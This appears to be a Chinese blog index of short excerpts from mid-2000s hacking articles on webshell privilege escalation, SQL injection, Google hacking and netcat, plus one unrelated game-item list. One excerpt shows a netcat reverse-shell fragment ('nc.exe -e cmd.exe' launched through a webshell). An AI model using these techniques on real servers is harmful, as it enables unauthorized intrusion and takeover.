原创 通過webshell獲得admin全攻略

作者:稻草人  QQ:16285939 話說到花了九牛二虎的力氣獲得了一個webshell,當然還想繼續獲得整個服務器的admin權限,正如不想得到admin的不是好黑客~嘻嘻~~好跟我來,看看有什麼可以利用的來提升權限*********

原创 解除TCP/IP限制的小技巧

作者:河馬史詩  http://www.wrsky.com 1.用NC反彈得到一個shell 本機監聽 NC -l -p 32 WEBSHELL運行: x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe

原创 sql injection終極利用方法

————只要給我一個注射點,無論什麼權限,我都給你一個webshell甚至系統權限原創:許文強(xwq),QQ:57133683聲明:本文僅用於教學目

原创 希望OL蝙蝠豬進化幸運豬的材料

馬伕之扙、兔耳、狼皮、兔子毛球、雞頭、雞上衣、雞下褲、雞爪、幸運草 森巴雞之棍狼皮 馬伕仗 兔耳朵 幸運卡 幸運草 雞頭 雞腿褲 雞上衣 雞腳 兔子毛球 點贊 收藏 分享 文章舉報

原创 從上傳webshell突破TCP/IP篩選到3389登陸

作者:lvhuana  來自:http://www.wrsky.com/ 日期:2004.12.11LvHuaNa一:得到webshell今天晚上的一次小小測試,由於本人太菜,再高深的技術我也不會,只能這樣了..........一切都已經

原创 nc的說明及使用

netcat被譽爲網絡安全界的‘瑞士軍刀',相信沒有什麼人不認識它吧...... 一個簡單而有用的工具,透過使用TCP或UDP協議的網絡連接去讀寫數據。它被設計成一個穩定的後門工具, 能夠直接由其它程序和腳本輕鬆驅動。同時,它也是一個功能

原创 Windows下權限設置詳解

創建時間:2005-02-15mrcool ([email protected])隨着動網論壇的廣泛應用和動網上傳漏洞的被發現以及SQL注入式攻擊越

原创 常用的google關鍵字

foo1 foo2 (也就是關聯,比如搜索xx公司 xx美女)operator:foofiletype:123 類型site:foo.com 相對直接看網站更有意思,可以得到許多意外的信息intext:foo in

原创 Google attack的利用

  以後給出的形式是這樣的,數字的後面跟的是要再google搜索的內容,後面跟着介紹和漏洞如何利用,由於本人時間有限制,所以就不翻譯了,如果大家有興趣的話自己翻譯翻譯吧.. 1.intitle:Login intext:"RT is ?

原创 2004·網絡安全圈

創建時間:2005-01-10root (webmaster_at_xfocus.org)2004·網絡安全圈網絡安全焦點<07/01/2004>走進

原创 克隆帳戶終結篇修正版

來源:歲月聯盟  豬豬幾句廢話:黑基發了我的克隆帳戶之終結篇後,很多朋友對我文章提出了寶貴意見.由於原文是自己無聊時隨便寫的,很多地方不夠嚴謹.於是我重新整理了此文,補充了一些資料,修改了不夠嚴謹的地方, 有問題歡迎來我blog上探討.序

原创 Sql注射中參數多次調用Echo解決辦法

來源:情感網絡 作者:xiaolu 我是在黑哥Blog看到的他寫的,先引用黑哥的: Quote: 文/superhei 解決辦法: 1.iget.v

原创 google hacking的實現以及應用

google hacking的實現以及應用(上)本文作者:sniper文章出於:www.4ngel.net日  期 : 05/01/26修改/發佈:

原创 SQL注入法攻擊一日通

出處:教主的'BLOG此文章是對網上大量同類文章的分析與總結,並結合自己實施過程中的體會綜合而成,其中有不少直接引用,沒有注意出處,請原作者見諒)隨着B/S模式應用開發的發展,使用這種模式編寫應用程序的程序員也越來越多。但是由於程序員的水

原创 Linux基本命令

Linux系統管理命令   wall命令  功能:這個命令的功能是對全部已登錄的用戶發送信息,用戶可以先把要發送的信息寫好存入一個文件中,然後輸入:   # wall < 文件名   這樣就能對所有的用戶發送信息了。   在上面的例子中